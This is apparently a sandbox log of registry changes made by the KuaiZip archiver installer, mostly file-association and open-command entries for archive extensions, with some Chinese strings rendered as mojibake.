"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.062\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.050]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.099\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.029\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.024\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.070]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 070 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.zip]
"(Default)" = "KuaiZip.zip"

[HKCR\KuaiZip.082]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 082 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.090]
"(Default)" = "NoAssociate.KZ"

[HKCR\.084]
"(Default)" = "KuaiZip.084"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.011]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.001]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.057]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.08\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.079\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.007]
"set" = "1"

[HKCR\KuaiZip.087\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.043]
"(Default)" = "KuaiZip.043"

[HKCR\KuaiZip.09\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.z]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ Z Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.045]
"(Default)" = "KuaiZip.045"

[HKCR\KuaiZip.030]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 030 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.076\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.078]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 078 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.026]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 026 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.7z\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.005\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.077]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 077 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.062]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 062 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.076]
"set" = "1"

[HKCR\.036]
"(Default)" = "KuaiZip.036"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.045]
"set" = "1"

[HKCR\KuaiZip.036\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.081]
"set" = "1"

[HKCR\KuaiZip.007\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.066]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 066 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.089\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.001]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 001 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.051\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.rpm]
"set" = "1"

[HKCR\KuaiZip.008\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.081]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 081 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.05]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 05 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.011]
"(Default)" = "KuaiZip.011"

[HKCR\KuaiZip.027\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.013]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 013 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.031]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.039\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.zip\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.059\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.021\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.07]
"set" = "1"

[HKCR\KuaiZip.cab]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ CAB Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\KuaiZip.003\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.054\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.069\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.tgz\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.068]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 068 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.005]
"(Default)" = "KuaiZip.005"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.052]
"set" = "1"

[HKCR\KuaiZip.056]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 056 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.077]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.058]
"set" = "1"

[HKCR\.081]
"(Default)" = "KuaiZip.081"

[HKCR\KuaiZip.06]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 06 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.mou\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.031\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.031]
"set" = "1"

[HKCR\.bz2]
"(Default)" = "KuaiZip.bz2"

[HKCR\.069]
"(Default)" = "KuaiZip.069"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.033]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.034]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.066]
"set" = "1"

[HKCR\.029]
"(Default)" = "KuaiZip.029"

[HKCR\KuaiZip.070\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.015]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 015 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.033]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.051]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 051 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.05]
"(Default)" = "KuaiZip.05"

[HKCR\.rpm]
"(Default)" = "KuaiZip.rpm"

[HKCR\KuaiZip_FileAsso.Origin\.036]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.088]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.tbz]
"set" = "1"

[HKCR\KuaiZip.097\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.018\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.070]
"set" = "1"

[HKCR\KuaiZip.088\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.072\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.086]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 086 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.lzh\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.008\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.026\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.016\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.039]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.070]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.028]
"set" = "1"

[HKCR\.04]
"(Default)" = "KuaiZip.04"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.084]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.026]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.041]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.017\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.052]
"(Default)" = "KuaiZip.052"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.071]
"set" = "1"

[HKCR\KuaiZip.012]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 012 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.082]
"(Default)" = "KuaiZip.082"

[HKCR\KuaiZip.095\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.095]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 095 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.072\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.094]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.016]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.094\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.lzh\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.006\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.080\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.043\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.054]
"(Default)" = "KuaiZip.054"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.gzip]
"set" = "1"

[HKCR\KuaiZip.075\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.052\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.015\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.071]
"(Default)" = "KuaiZip.071"

[HKCR\KuaiZip.029\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.7z]
"set" = "1"

[HKCR\KuaiZip.rar\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,4"

[HKCR\KuaiZip.086\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.mou]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ MOU Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.053]
"(Default)" = "KuaiZip.053"

[HKCR\KuaiZip.064\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.09]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.049]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.045]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.009]
"set" = "1"

[HKCR\KuaiZip.rpm]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ RPM Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.087]
"set" = "1"

[HKCR\KuaiZip.07\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.065]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 065 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.063]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 063 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.tgz]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ TGZ Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.7z]
"(Default)" = "KuaiZip.7z"

[HKCR\.arj]
"(Default)" = "KuaiZip.arj"

[HKCR\KuaiZip.002\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.034\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.rpm]
"(Default)" = "NoAssociate.KZ"

[HKCR\.026]
"(Default)" = "KuaiZip.026"

[HKCR\KuaiZip.045\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.jar\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.rar]
"(Default)" = "KuaiZip.rar"

[HKCR\KuaiZip_FileAsso.Origin\.006]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.056]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.01\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCR\KuaiZip_FileAsso.Origin\.067]
"(Default)" = "NoAssociate.KZ"

[HKCR\.034]
"(Default)" = "KuaiZip.034"

[HKCR\KuaiZip.092\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.tbz\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.085\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.095]
"set" = "1"

[HKCR\KuaiZip.045\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.040]
"set" = "1"

[HKCR\KuaiZip.042]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 042 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.003]
"(Default)" = "KuaiZip.003"

[HKCR\KuaiZip.097\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.025\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.032]
"(Default)" = "KuaiZip.032"

[HKCR\KuaiZip.060\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.zip]
"(Default)" = "CompressedFolder"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.068]
"set" = "1"

[HKCR\KuaiZip.062\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.056]
"(Default)" = "KuaiZip.056"

[HKCR\.025]
"(Default)" = "KuaiZip.025"

[HKCR\KuaiZip_FileAsso.Origin\.z]
"(Default)" = ""

[HKCU\Software\KuaiZip\KuaiZip\Setup\.078]
"set" = "1"

[HKCR\.035]
"(Default)" = "KuaiZip.035"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.042]
"set" = "1"

[HKCR\KuaiZip.07]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 07 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.025\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.010]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 010 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.063]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.068\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.046]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 046 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.068]
"(Default)" = "KuaiZip.068"

[HKCR\KuaiZip.096\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.075]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 075 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\KuaiZip.tbz]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ TBZ Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.098]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 098 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.023]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.053]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.010\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.7z]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 7Z Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.012]
"(Default)" = "KuaiZip.012"

[HKCR\KuaiZip.03\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.081]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.099\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.064]
"(Default)" = "KuaiZip.064"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.024]
"set" = "1"

[HKCR\KuaiZip.003]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 003 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.036]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.071]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.094]
"set" = "1"

[HKCR\KuaiZip.084\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.037\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.034]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 034 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.023\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.039]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 039 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.069]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.099]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.064]
"set" = "1"

[HKCR\KuaiZip.064\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.089\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.01\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
